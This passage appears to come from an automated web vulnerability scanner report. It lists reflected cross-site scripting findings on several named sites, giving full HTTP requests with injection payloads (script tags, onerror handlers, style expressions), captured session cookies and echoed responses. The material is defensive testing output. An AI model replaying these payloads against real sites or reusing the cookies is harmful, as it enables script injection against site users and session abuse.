Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:42 GMT
Server: Apache
X-Server-Name: web62
Content-Length: 888
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.212

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYB_728x90301ff</script><script>alert(1)</script>e2929316508_None_Network");
</script>
...[SNIP]...

3.102. http://www.myyearbook.com/advertising/default.php [sub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the sub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47ba1</script><script>alert(1)</script>6c9fe22fa6a was submitted in the sub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network47ba1</script><script>alert(1)</script>6c9fe22fa6a HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:42 GMT
Server: Apache
X-Server-Name: web59
Content-Length: 888
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.128

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYB_728x90_None_Network47ba1</script><script>alert(1)</script>6c9fe22fa6a");
</script>
...[SNIP]...

3.103. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.othersonline.com
Path:   /partner/scripts/myyearbook/page_parser.js

Issue detail

The value of the d request parameter is copied into a JavaScript inline comment. The payload a7303*/alert(1)//69ec540a16f was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/scripts/myyearbook/page_parser.js?d=games.myyearbook.coma7303*/alert(1)//69ec540a16f HTTP/1.1
Host: www.othersonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cd=false

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Cache-control: private
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 21 Jul 2011 18:01:56 GMT
Expires: Thu, 21 Jul 2011 19:01:56 GMT
Last-Modified: Thu, 21 Jul 2011 18:01:56 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: TRP Apache-Coyote/1.1
Set-Cookie: cd=false; path=/; domain=.othersonline.com; expires=Wed, 16-Apr-2014 18:01:56 GMT
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 17452


/*! Copyright 2009,2010 Others Online Inc. All Rights Reserved. No permission is granted to use, copy or extend this code */


/*
   The requested resource (/oz/scripts/domains/myyearbook.coma7303*/alert(1)//69ec540a16f/page_parser_hooks.js) is not available
*/


function oz_trim(A){return A.replace(/^\s+|\s+$/g,"");}function PageParser(){this.timeout=2000;this.doc=document;this.stopwords=null;this.init=function(
...[SNIP]...

3.104. http://www.paloaltonetworks.com/cam/switch/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paloaltonetworks.com
Path:   /cam/switch/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdde1"><script>alert(1)</script>3e7c90a48f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cam/switch/index.php?ts=scmag&bdde1"><script>alert(1)</script>3e7c90a48f6=1 HTTP/1.1
Host: www.paloaltonetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: X-Mapping-mkmfjdci=CCDCC4EE41D6AB1FEC3D09C002EBB5F8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Fri, 22 Jul 2011 20:15:22 GMT
Connection: Keep-Alive
Content-Length: 8296

<!DOCTYPE html>


<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <meta name="generator" content="Dreamweaver">
   <meta name="author" content="C. W. Miller
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag&bdde1"><script>alert(1)</script>3e7c90a48f6=1" title="Facebook" target="_blank">
...[SNIP]...

3.105. http://www.paloaltonetworks.com/cam/switch/index.php [ts parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paloaltonetworks.com
Path:   /cam/switch/index.php

Issue detail

The value of the ts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e3d"><script>alert(1)</script>1d3ace0c8b0 was submitted in the ts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cam/switch/index.php?ts=scmag27e3d"><script>alert(1)</script>1d3ace0c8b0 HTTP/1.1
Host: www.paloaltonetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: X-Mapping-mkmfjdci=CCDCC4EE41D6AB1FEC3D09C002EBB5F8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Fri, 22 Jul 2011 20:15:11 GMT
Connection: Keep-Alive
Content-Length: 8287

<!DOCTYPE html>


<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <meta name="generator" content="Dreamweaver">
   <meta name="author" content="C. W. Miller
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag27e3d"><script>alert(1)</script>1d3ace0c8b0" title="Facebook" target="_blank">
...[SNIP]...

3.106. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5df8d"><a>fbb1b57e20d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /external5df8d"><a>fbb1b57e20d/ads/clo.gif?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:27:24 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external5df8d%22%3E%3Ca%3Efbb1b57e20d; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:27:24 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:42:24 GMT;path=/
Content-Length: 20417

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/external5df8d"><a>fbb1b57e20d/ads/clo.gif"/>
...[SNIP]...

3.107. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee87a"><script>alert(1)</script>dca7ddc88f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /externalee87a"><script>alert(1)</script>dca7ddc88f2/ads/clo.gif?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:25:47 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=externalee87a%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:25:47 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:40:47 GMT;path=/
Content-Length: 20802

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/externalee87a"><script>alert(1)</script>dca7ddc88f2/ads/clo.gif"/>
...[SNIP]...

3.108. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20110"%20onerror%3dalert(1)%20b0a6ae9eaae was submitted in the REST URL parameter 2. This input was echoed as 20110" onerror=alert(1) b0a6ae9eaae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /external/ads20110"%20onerror%3dalert(1)%20b0a6ae9eaae/clo.gif?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:28:17 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:28:17 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:43:17 GMT;path=/
Content-Length: 20672

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Ads20110" Onerror=alert(1) B0a6ae9eaae clo.gif" />
...[SNIP]...

3.109. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8c41"style%3d"x%3aexpression(alert(1))"ae3298a1aff was submitted in the REST URL parameter 2. This input was echoed as a8c41"style="x:expression(alert(1))"ae3298a1aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /external/adsa8c41"style%3d"x%3aexpression(alert(1))"ae3298a1aff/clo.gif?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:26:19 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:26:19 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:41:19 GMT;path=/
Content-Length: 20992

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Adsa8c41"style="x:expression(alert(1))"ae3298a1aff clo.gif" />
...[SNIP]...

3.110. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0a12<x%20style%3dx%3aexpression(alert(1))>0f286142cd1 was submitted in the REST URL parameter 2. This input was echoed as b0a12<x style=x:expression(alert(1))>0f286142cd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /external/b0a12<x%20style%3dx%3aexpression(alert(1))>0f286142cd1/clo.gif?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:28:46 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:28:46 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:43:46 GMT;path=/
Content-Length: 20774

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<strong>B0a12<x Style=x:expression(alert(1))>0f286142cd1</strong>
...[SNIP]...

3.111. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fce10<a>d35bf455d71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /external/ads/clo.giffce10<a>d35bf455d71?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:27:18 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:27:18 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:42:18 GMT;path=/
Content-Length: 20658

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<span>One sec... we're building clo.giffce10<a>d35bf455d71 for <strong>
...[SNIP]...

3.112. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb54"><script>alert(1)</script>21b545085de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external/ads/clo.gif4eb54"><script>alert(1)</script>21b545085de?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:26:58 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:26:58 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:41:58 GMT;path=/
Content-Length: 20756

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/external/ads/clo.gif4eb54"><script>alert(1)</script>21b545085de"/>
...[SNIP]...

3.113. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2112e"style%3d"x%3aexpression(alert(1))"2aaa2fd7024 was submitted in the REST URL parameter 3. This input was echoed as 2112e"style="x:expression(alert(1))"2aaa2fd7024 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

